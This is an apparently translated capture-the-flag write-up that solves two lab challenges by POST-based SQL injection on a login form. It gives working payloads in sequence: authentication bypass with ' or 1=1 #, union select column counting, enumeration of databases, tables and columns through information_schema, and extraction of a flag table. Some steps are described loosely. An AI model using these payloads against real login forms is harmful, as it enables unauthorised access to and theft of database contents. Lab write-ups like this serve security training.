SQL injection-POST type
Range address
Principle:
POST injection is to use post to pass parameters, the user submits data and interacts with the database, and extracts useful information from the database
first question:
We first check the source
code and run the code directly without doing any processing. Therefore, we only need to close the previous code of username, and then comment out the following code to achieve data interaction.
I enter in the account box
' or 1=1 #
Direct display
So, I to determine the number of fields to
sequentially input the code
'union select 1#
'union select 1,2#
'union select 1,2,3#
It is found that only the third one shows that the login is successful.
So, the number of judgment fields is 3
Next, we use database() to query the database name: enter the code
and enter it in turn
'union select 1,2,database() limit 0,1 #
…
'union select 1,2,database() limit 9,1 #
error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar
Query the database, post_error, and judge that the flag may be in it
So continue to enter the code
'union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #
Find the flag
Continue to look up the table name:
enter the code
'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 0,1 #
'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 1,1 #
'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 2,1 #
It is found that it has two column names:
flag
id,
then find the flag,
directly query the flag data,
enter the code
' union select 1,2,group_concat(flag) from flag#
So get the flag
Second question
The method is the same, but its source code is different.
We need to use
”) or 1=1 #
The login is successful, there is a post injection vulnerability,
so I first judge the number of fields
and enter the code in turn
") union select 1#
")union select 1,2#
") union select 1,2,3#
There are three judgment fields.
Then, we use database() to query the database name: enter the code
and enter it in turn
")union select 1,2,database() limit 0,1 #
…
")union select 1,2,database() limit 9,1 #
error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar
query to the database, post_error, judgment flag may be there
So continue to enter the code
") union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #
It is found that it has two column names:
flag
id,
then find the flag,
directly query the flag data,
enter the code
") union select 1,2,group_concat(flag) from flag#
So I got the second question of flag